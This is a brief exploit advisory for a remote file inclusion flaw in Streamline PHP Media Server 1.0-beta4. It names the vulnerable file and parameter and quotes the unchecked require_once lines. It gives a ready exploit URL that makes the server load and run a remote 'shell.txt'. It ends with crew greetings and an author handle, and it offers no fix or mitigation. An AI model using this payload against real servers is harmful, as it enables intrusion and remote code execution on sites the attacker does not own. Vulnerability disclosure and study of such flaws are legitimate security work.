Streamline PHP Media Server version 1.0-beta4 suffers from a remote file inclusion vulnerability.
9cd7c978e6a572a3fdec146c2e208a17cf2817369c03cbc95d94e33c3aee3f43
Vulnerability Type: Remote File Inclusion
Vulnerable file: /streamline-1.0-beta4/src/core/theme/includes/account_footer.php
Exploit URL: http://localhost/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: sl_theme_unix_path
Line number: 2
Lines:
----------------------------------------------
<?
require_once( $sl_theme_unix_path."/account/footer.php" );
require_once( $sl_theme_unix_path."/common/footer.php" );
----------------------------------------------
GrEeTs To sHaDoW sEcUrItY TeAm & str0ke
FoUnD By BiNgZa
DoRk: :(
shadowcrew@hotmail.co.uk